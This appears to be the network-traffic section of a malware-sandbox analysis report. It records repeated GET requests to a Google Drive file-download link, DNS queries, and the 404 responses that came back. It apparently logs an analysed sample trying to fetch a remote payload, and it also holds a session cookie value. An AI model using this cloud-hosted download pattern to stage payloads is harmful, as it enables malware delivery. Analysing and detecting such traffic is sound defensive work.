      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:03:01 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-oNPDdKAk37_6oigAA74vJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC5jf1TaTr9YTTJPToHFfbzYasyfvoHbXluHJrAH5cmUs9ZhDBjVIqFmUuxRHE7rBYv6fwMServer: UploadServerSet-Cookie: 
NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF; expires=Fri, 06-Jun-2025 16:03:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:03:13 GMTContent-Security-Policy: script-src 'nonce-Mmoj_ohssKHKHy5i_yN9cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC7-mo0eyhSx3jVfBzA13XnWUgKAUmJuKurAgPVwfzX6ldUm5jmWvaoqHpiL_Z1eCVCcWy8Q5jjyJwServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:03:24 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-jfBBg7CqfuES3iRANo0zmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC7esx6BrnvM0LaBVwwcbk3EBnvewExtBtZLxpLHAm4ls9aC1kSK0v3ZZft3WNz-XLUjlbMServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:03:35 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-qsoCTM7zQRXihrro6J53yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652X-GUploader-UploadID: AFiumC6aCsKJrMqKR-SWJ3Ne4FfW9hoxL195L1n3RcGCE9NcXw2I-vwrlnVBKjt96Xm_Tg9cT9WlmQgINgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:03:46 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7TnWtPbsWZ7wmD8vRnGV0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652X-GUploader-UploadID: AFiumC5optG5Un4AE1YB_ns3GjnZPPjMsYeraNIJue9hWMqGActRp3nNp3l8WXwX9QovpBY7WEYDDnRwswServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
